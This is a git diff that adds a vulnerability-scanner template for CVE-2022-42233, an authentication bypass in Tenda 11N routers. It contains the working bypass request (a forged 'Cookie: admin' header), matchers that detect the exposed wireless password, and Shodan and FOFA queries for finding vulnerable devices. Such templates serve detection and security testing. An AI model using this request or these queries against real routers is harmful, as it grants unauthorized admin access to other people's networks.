diff --git a/cves/2022/CVE-2022-42233.yaml b/cves/2022/CVE-2022-42233.yaml new file mode 100644 index 0000000000..effea3044a --- /dev/null +++ b/cves/2022/CVE-2022-42233.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-42233 + +info: + name: Tenda 11N - Authentication Bypass + author: For3stCo1d + severity: critical + description: | + Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability. + reference: + - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-42233 + metadata: + verified: true + shodan-query: http.title:"Tenda 11N" + fofa-query: product=="Tenda-11N-Wireless-AP" + tags: cve,cve2022,tenda,auth-bypass,router,iot + +requests: + - raw: + - | + GET /index.asp HTTP/1.1 + Host: {{Hostname}} + Cookie: admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'def_wirelesspassword' + - 'Tenda 11N' + condition: and + case-insensitive: true + + - type: word + part: header + words: + - 'GoAhead-Webs' + + - type: status + status: + - 200